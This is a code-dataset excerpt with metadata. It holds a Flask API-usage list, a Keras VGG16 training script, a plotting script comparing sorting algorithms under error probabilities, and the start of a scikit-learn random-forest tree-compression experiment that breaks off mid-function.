"line_number": 310, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 310, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 312, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 312, "usage_type": "name"}, {"api_name": "lib.scrape.ProjectReflection", "line_number": 313, "usage_type": "call"}, {"api_name": "lib.scrape", "line_number": 313, "usage_type": "name"}, {"api_name": "flask.request.cookies.get", "line_number": 315, "usage_type": "call"}, {"api_name": "flask.request.cookies", "line_number": 315, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 315, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 316, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 316, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 317, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 317, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 329, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 329, "usage_type": "name"}, {"api_name": "lib.scrape.ProjectReflection.objects", "line_number": 330, "usage_type": "call"}, {"api_name": "lib.scrape.ProjectReflection", "line_number": 330, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 330, "usage_type": "name"}, {"api_name": "lib.scrape.set_reload_page", "line_number": 344, "usage_type": "call"}, {"api_name": "lib.scrape", "line_number": 344, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 345, "usage_type": "call"}, {"api_name": "lib.display.get_project_page", "line_number": 353, "usage_type": "call"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 353, "usage_type": "argument"}, {"api_name": "lib.display", "line_number": 353, "usage_type": "name"}, {"api_name": "lib.settings.PROJECT_CACHE_LENGTH", "line_number": 349, "usage_type": "name"}, {"api_name": "lib.scrape.get_reload_project", "line_number": 350, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 350, "usage_type": "name"}, {"api_name": "lib.authentication.session_active", "line_number": 351, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 351, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 358, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 364, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 364, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 365, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 365, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 366, "usage_type": "call"}, {"api_name": "lib.schema.Challenge.objects", "line_number": 367, "usage_type": "call"}, {"api_name": "lib.schema.Challenge", "line_number": 367, "usage_type": "attribute"}, {"api_name": "lib.schema", "line_number": 367, "usage_type": "name"}, {"api_name": "ccl_scratch_tools.Scraper", "line_number": 369, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 370, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 370, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 373, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 373, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 374, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 374, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 376, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 376, "usage_type": "name"}, {"api_name": "lib.scrape.rescrape_all.delay", "line_number": 377, "usage_type": "call"}, {"api_name": "lib.scrape.rescrape_all", "line_number": 377, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 377, "usage_type": "name"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 377, "usage_type": "name"}, {"api_name": "lib.scrape.add_studio.delay", "line_number": 380, "usage_type": "call"}, {"api_name": "lib.scrape.add_studio", "line_number": 380, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 380, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 382, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 382, "usage_type": "name"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 383, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 384, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 386, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 362, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 396, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 396, "usage_type": "name"}, {"api_name": "lib.scrape.Studio.objects", "line_number": 397, "usage_type": "call"}, {"api_name": "lib.scrape.Studio", "line_number": 397, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 397, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 406, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 406, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 407, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 407, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 408, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 408, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 409, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 409, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 410, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 410, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 411, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 411, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 412, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 412, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 413, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 413, "usage_type": "name"}, {"api_name": "lib.scrape.Project.objects", "line_number": 419, "usage_type": "call"}, {"api_name": "lib.scrape.Project", "line_number": 419, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 419, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 431, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 431, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 437, "usage_type": "call"}, {"api_name": "lib.common.connect_db", "line_number": 439, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 439, "usage_type": "name"}, {"api_name": "lib.scrape.Studio.objects", "line_number": 440, "usage_type": "call"}, {"api_name": "lib.scrape.Studio", "line_number": 440, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 440, "usage_type": "name"}, {"api_name": "lib.authentication.session_active", "line_number": 443, "usage_type": "call"}, {"api_name": "lib.authentication", "line_number": 443, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 444, "usage_type": "call"}, {"api_name": "lib.scrape.Project.objects", "line_number": 446, "usage_type": "call"}, {"api_name": "lib.scrape.Project", "line_number": 446, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 446, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 458, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 467, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 467, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 468, "usage_type": "call"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 468, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 471, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 471, "usage_type": "name"}, {"api_name": "lib.scrape.Project.objects", "line_number": 472, "usage_type": "call"}, {"api_name": "lib.scrape.Project", "line_number": 472, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 472, "usage_type": "name"}, {"api_name": "lib.scrape.Studio.objects", "line_number": 478, "usage_type": "call"}, {"api_name": "lib.scrape.Studio", "line_number": 478, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 478, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 487, "usage_type": "call"}, {"api_name": "lib.common.connect_db", "line_number": 496, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 496, "usage_type": "name"}, {"api_name": "lib.scrape.Studio.objects", "line_number": 497, "usage_type": "call"}, {"api_name": "lib.scrape.Studio", "line_number": 497, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 497, "usage_type": "name"}, {"api_name": "lib.schema.Challenge.objects", "line_number": 506, "usage_type": "call"}, {"api_name": "lib.schema.Challenge", "line_number": 506, "usage_type": "attribute"}, {"api_name": "lib.schema", "line_number": 506, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 528, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 494, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 494, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 535, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 535, "usage_type": "name"}, {"api_name": "lib.settings.PROJECT_DIRECTORY", "line_number": 536, "usage_type": "argument"}, {"api_name": "json.load", "line_number": 537, "usage_type": "call"}, {"api_name": "lib.common.md", "line_number": 540, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 540, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 542, "usage_type": "call"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 544, "usage_type": "argument"}, {"api_name": "flask.Response", "line_number": 545, "usage_type": "call"}, {"api_name": "lib.settings.PROJECT_DIRECTORY", "line_number": 552, "usage_type": "argument"}, {"api_name": "lib.summary.generate_summary_page.delay", "line_number": 561, "usage_type": "call"}, {"api_name": "lib.summary.generate_summary_page", "line_number": 561, "usage_type": "attribute"}, {"api_name": "lib.summary", "line_number": 561, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 562, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 559, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 569, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 567, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 567, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 575, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 573, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 573, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 581, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 579, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 579, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 587, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 585, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 585, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 593, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 591, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 591, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 600, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 598, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 598, "usage_type": "name"}, {"api_name": "flask.request.path", "line_number": 606, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 606, "usage_type": "name"}, {"api_name": "lib.settings.REDIRECT_PAGES", "line_number": 606, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 607, "usage_type": "call"}, {"api_name": "lib.settings.REDIRECT_PAGES", "line_number": 607, "usage_type": "name"}, {"api_name": "flask.request.path", "line_number": 607, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 607, "usage_type": "name"}, {"api_name": "lib.errors.add_error", "line_number": 610, "usage_type": "call"}, {"api_name": "lib.errors", "line_number": 610, "usage_type": "name"}, {"api_name": "flask.request.url", "line_number": 611, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 611, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 612, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.HTTPException", "line_number": 615, "usage_type": "argument"}, {"api_name": "werkzeug.exceptions.InternalServerError", "line_number": 616, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 620, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.default_exceptions", "line_number": 624, "usage_type": "name"}]}
+{"seq_id": "333863785", "text": "from keras.applications.vgg16 import VGG16\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.layers import Input, Flatten, Dense\nfrom keras.models import Model\nfrom keras.optimizers import SGD\nfrom keras.callbacks import TensorBoard, ModelCheckpoint\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom tqdm import tqdm\n\nimageX = 100\nimageY = 100\n\ndef loadData(dir):\n lines = open(dir).read().split('\\n')[:-1]\n X = []\n Y = []\n for line in tqdm(lines):\n try:\n x, y = line.split('|')\n x = load_img(x, target_size=(imageX, imageY))\n x = img_to_array(x)\n yoh = [0, 0]\n yoh[int(y)]=1\n Y.append(yoh)\n X.append(x)\n except:\n print('missed image')\n\n X = np.array(X)\n Y = np.array(Y)\n X = preprocess_input(X)\n print(X.shape, Y.shape)\n\n return X, Y\n\ndef train():\n vgg = VGG16(include_top = False, classes=2, input_shape=(imageX, imageY, 3))\n\n input = Input(shape=(imageX, imageY, 3), name = 'image_input')\n\n vgg = vgg(input)\n\n x = Flatten(name='flatten')(vgg)\n x = Dense(2, activation='softmax', name='predictions')(x)\n\n vgg = Model(input=input, output=x)\n\n vgg.summary()\n\n sgd = SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)\n vgg.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n tb = TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True)\n\n X, Y = loadData(\"clean\")\n X /= 255\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2)\n\n batch_size = 32\n nb_epoch = 1000\n\n filepath=\"weights-improvement-{epoch:02d}.hdf5\"\n\n cp = ModelCheckpoint('model-{epoch:03d}.h5', verbose=1, monitor='val_acc',save_best_only=True, mode='auto')\n\n print('training ========================================================================================')\n\n vgg.fit(X_train, y_train,\n batch_size=batch_size,\n epochs=nb_epoch,\n validation_data=[X_test, y_test],\n shuffle=True,\n callbacks=[tb, cp])\n\ntrain()\n", "sub_path": "vgg/src/scratch.py", "file_name": "scratch.py", "file_ext": "py", "file_size_in_byte": 2214, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tqdm.tqdm", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.load_img", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.applications.vgg16.preprocess_input", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.applications.vgg16.VGG16", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.optimizers.SGD", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.callbacks.TensorBoard", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "399779381", "text": "#imports\nimport os\n\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as font_manager\n\nimport numpy as np\nimport pandas as pd\n\nimport seaborn as sns\nplt.style.use('seaborn-whitegrid')\n\nimport util_graficos as graf\n\n# %matplotlib inline\n\n# ========================================================\n# estilos de graficos :\n# >> https://tonysyu.github.io/raw_content/matplotlib-style-gallery/gallery.html\n# ========================================================\n# plt.style.use('seaborn-whitegrid')\n# plt.style.use('seaborn-pastel')\n# plt.style.use('seaborn-colorblind')\n# plt.style.use('seaborn-bright')\n# plt.style.use('grayscale')\n# plt.style.use('ggplot')\n# plt.style.use('fivethirtyeight')\n# plt.style.use('dark_background')\n# plt.style.use('classic')\n# plt.style.use('bmh')\n\n\n\npasta_origem = '../data/data_grouped'\narq_metadata = open('%s/_metadata.csv' % (pasta_origem), 'w+')\n\nprobs = ['0.01','0.02','0.05','0.001','0.0001']\n# probs = ['0.01']#,'0.02']#,'0.05','0.001','0.0001']\n\nsizes = ['100','1000','10000']\n\ndf_tudo = pd.DataFrame()\n\n#le os arquivos de entrada\nfor prob in probs:\n for size in sizes:\n filtro_arq = '%s_%s_' % (prob, size)\n\n arqs_in = os.listdir(pasta_origem)\n for f in arqs_in:\n if (f.startswith(filtro_arq)):\n print(f)\n csv = os.path.join(pasta_origem, f)\n df_temp = pd.read_csv(delimiter = ';', filepath_or_buffer = csv)\n df_tudo = df_tudo.append(df_temp)\n\n#ordena os registros por algoritmo\ndf_tudo.sort_values(by=['size_of_array','algoritmo'], inplace=True, ascending=[True,True])\n\n\n# gera os graficos\nrows = 5\ncols = 2\n\nlarg_fig = 32\nalt_fig = 41\nfont_size = 15\n\nsns_palette = 'Set2'\ncolor_map = sns.color_palette(sns_palette, n_colors=4)\n\ngerar_graficos = True\ngerar_csvs_com_dados_dos_graficos = True\n\ndf_dados_csv = pd.DataFrame()\n\nfor prob in probs:\n data = df_tudo[df_tudo.probabilidade_erro == float(prob)]\n\n group_by = ['probabilidade_erro', 'algoritmo']\n df_means = data.groupby(group_by).mean()\n df_std = data.groupby(group_by).std()\n df_min = data.groupby(group_by).min()\n df_max = data.groupby(group_by).max()\n\n # colunas_join = ['largest_sorted_subarray','k_unordered_sequence','percentual_k_unordered','percentual_maior_array']\n colunas_join = ['percentual_k_unordered','percentual_maior_array']\n df_dados_csv = df_means[colunas_join]\n df_dados_csv = df_dados_csv.join(other=df_std[colunas_join], rsuffix='_std')\n df_dados_csv = df_dados_csv.join(other=df_min[colunas_join], rsuffix='_min')\n df_dados_csv = df_dados_csv.join(other=df_max[colunas_join], rsuffix='_max', lsuffix='_mean')\n\n indx = 1\n\n #se tiver dados no DF\n if (data.shape[0] > 0):\n # print(data.head())\n\n file_title = 'Estatisticas_por_Algoritmo_Juntando_os_Tamanhos_Prob_%s' % (prob)\n\n if (gerar_csvs_com_dados_dos_graficos):\n df_dados_csv.to_csv('graficos/comparacao_entre_algoritmos/csv/%s.csv' % (file_title))\n\n if (gerar_graficos):\n graf_title = 'Estatísticas por Algoritmo Juntando Todos os Tamanhos - Probabilidade de Erro %s' % (prob)\n\n fig = plt.figure(figsize=[larg_fig, alt_fig])\n plt.suptitle(graf_title + '\\nBarplot / Média / Desvio Padrão / Mín. / Máx.', fontsize=30)\n plt.rcParams.update({'font.size': font_size})\n\n #grafico de barras para % Desordenados\n ax = plt.subplot(rows, cols, indx)\n graf.gerarBarplot(ax=ax, x='probabilidade_erro',\n y='percentual_k_unordered',\n hue='algoritmo',\n data=data,\n title='% Desordenados',\n palette=color_map)\n graf.inserirValoresNasBarras(ax, df_means['percentual_k_unordered'] )\n indx += 1\n\n #grafico de barras para % Maior Array\n ax = plt.subplot(rows, cols, indx)\n graf.gerarBarplot(ax=ax, x='probabilidade_erro',\n y='percentual_maior_array',\n hue='algoritmo',\n data=data,\n title='% Maior Array',\n palette=color_map)\n graf.inserirValoresNasBarras(ax, df_means['percentual_maior_array'].values)\n indx += 1\n\n # grafico de barras para a média das % Desordenados\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Média - percentual_k_unordered')\n data_graf = df_means['percentual_k_unordered'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_means['percentual_k_unordered'].values)\n indx += 1\n\n # grafico de barras para a média das % Maior Array\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Média - percentual_maior_array')\n data_graf = df_means['percentual_maior_array'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_means['percentual_maior_array'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Desordenados\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Desvio P. - percentual_k_unordered')\n data_graf = df_std['percentual_k_unordered'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_std['percentual_k_unordered'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Maior Array\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Desvio P. - percentual_maior_array')\n data_graf = df_std['percentual_maior_array'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_std['percentual_maior_array'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Desordenados\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Mín. - percentual_k_unordered')\n data_graf = df_min['percentual_k_unordered'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_min['percentual_k_unordered'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Maior Array\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Mín. - percentual_maior_array')\n data_graf = df_min['percentual_maior_array'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_min['percentual_maior_array'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Desordenados\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Máx. - percentual_k_unordered')\n data_graf = df_max['percentual_k_unordered'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_max['percentual_k_unordered'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Maior Array\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Máx. - percentual_maior_array')\n data_graf = df_max['percentual_maior_array'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_max['percentual_maior_array'].values)\n indx += 1\n\n #salva o gráfico\n plt.savefig('graficos/comparacao_entre_algoritmos/%s.png' % (file_title), bbox_inches='tight', pad_inches=2) # , format='png', orientation='landscape', papertype='letter')\n", "sub_path": "_fabiano/python/03-Medias_por_algoritmo_e_prob_erro_juntando_todos_tamanhos.py", "file_name": "03-Medias_por_algoritmo_e_prob_erro_juntando_todos_tamanhos.py", "file_ext": "py", "file_size_in_byte": 7915, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 11, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 42, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "seaborn.color_palette", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 109, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "util_graficos.gerarBarplot", "line_number": 113, "usage_type": "call"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "util_graficos.gerarBarplot", "line_number": 124, "usage_type": "call"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}]}
+{"seq_id": "651218657", "text": "import numpy as np\nimport metrics\nimport datasets\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import KFold\nfrom hypothesis import TreeHypothesis\nfrom consistency import MCConsistentTree\nfrom hypothesis_search import MCHypothesisSearch\nfrom algorithms import crembo\n\n\ndef compress_tree(n_estimators, max_tree_depth, max_forest_depth, X_train, y_train, c, weight=None, X_val=None,\n y_val=None, score=None, delta=1):\n # All but MED are trained on x_val as well\n X_train = np.concatenate([X_train, X_val], axis=0)\n y_train = np.concatenate([y_train, y_val], axis=0)\n\n # train benchmark tree\n b_tree = DecisionTreeClassifier(max_depth=max_tree_depth, class_weight=weight)\n b_tree.fit(X_train, y_train)\n f_b = TreeHypothesis('Tree_bench', b_tree)\n\n # train random forest to create a collection of hypotheses\n rf = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_forest_depth, class_weight=weight)\n rf.fit(X_train, y_train)\n\n # get trees from forest\n hypotheses = []\n for i in range(len(rf.estimators_)):\n name = f'Tree_{i}'\n hypotheses.append(TreeHypothesis(name, f=rf.estimators_[i]))\n\n # define consistency and hypothesis search algorithms\n consistency = MCConsistentTree(depth=max_tree_depth, class_weight=weight)\n a = MCHypothesisSearch(consistency, X_val=X_val, y_val=y_val, score=score)\n\n f_med, depth, y1 = crembo(s=X_train, t=hypotheses, c=c, a=a, delta=delta)\n\n # train a tree with all the data labels from MCMA\n tree = DecisionTreeClassifier(max_depth=max_tree_depth, class_weight=weight)\n tree.fit(X_train, y1)\n f_voting = TreeHypothesis('Tree_voting', tree)\n\n return rf, hypotheses, f_med, f_voting, f_b\n\n\ndef robustness_agreement_exp(dataset, max_tree_depth, forest_depth, num_trees, num_experiments=1,\n score='accuracy', weight=None, 